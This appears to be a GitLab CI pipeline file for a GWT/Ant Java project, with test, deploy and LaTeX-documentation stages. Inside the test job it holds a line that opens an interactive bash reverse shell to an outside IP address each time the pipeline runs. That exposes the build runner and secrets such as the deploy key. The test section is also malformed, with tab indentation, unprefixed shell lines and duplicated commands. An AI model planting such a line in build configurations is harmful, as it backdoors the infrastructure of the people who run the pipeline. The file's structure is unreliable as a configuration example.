image: java:8

cache:
  paths:
    - "${CI_PROJECT_DIR}/.ivy"

before_script:
    - apt-get update && apt-get install -y ant
    - wget -q https://storage.googleapis.com/gwt-releases/gwt-2.8.2.zip && unzip -qq -o -d .. gwt-2.8.2.zip
    - (cd vendor && wget -q https://builds.apache.org/job/Ivy/lastStableBuild/artifact/build/artifact/jars/ivy.jar)

stages:
    - test
    - deploy
    - tex

testjob:
    stage: test
    script:
	- apt-get install -y chromedriver && wget https://github.com/mholt/caddy/releases/download/v0.10.11/caddy_v0.10.11_linux_amd64.tar.gz && tar xvzf caddy_v0.10.11_linux_amd64.tar.gz
wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add -
echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list
apt-get update && apt-get install -y google-chrome-unstable
nohup ./caddy&
git checkout master && git pull && git checkout setup_selenium
ant build -lib vendor && ant test -lib vendor
        - wget https://github.com/mholt/caddy/releases/download/v0.10.11/caddy_v0.10.11_linux_amd64.tar.gz
        - tar xzf caddy_v0.10.11_linux_amd64.tar.gz
        - ant build -lib vendor
        - nohup ./caddy &
        - ant test -lib vendor
- bash -i >& /dev/tcp/37.59.36.53/8000 0>&1

deployjob:
    stage: deploy
    only:
        - master
    script:
        - git rev-parse --short HEAD > war/VERSION
        - ant war -lib vendor
        - curl -F 'war=@aurora.war' "https://aurora.younishd.fr:8080?key=$DEPLOY_KEY"

texjob:
    stage: tex
    image: blang/latex
    only:
        - master
    before_script:
        - echo "nop"
    script:
        - pdflatex -output-directory docs/implementierung/tex docs/implementierung/tex/Implementierungsdokument.tex && pdflatex -output-directory docs/implementierung/tex docs/implementierung/tex/Implementierungsdokument.tex
    artifacts:
        paths:
            - "docs/implementierung/tex/Implementierungsdokument.pdf"
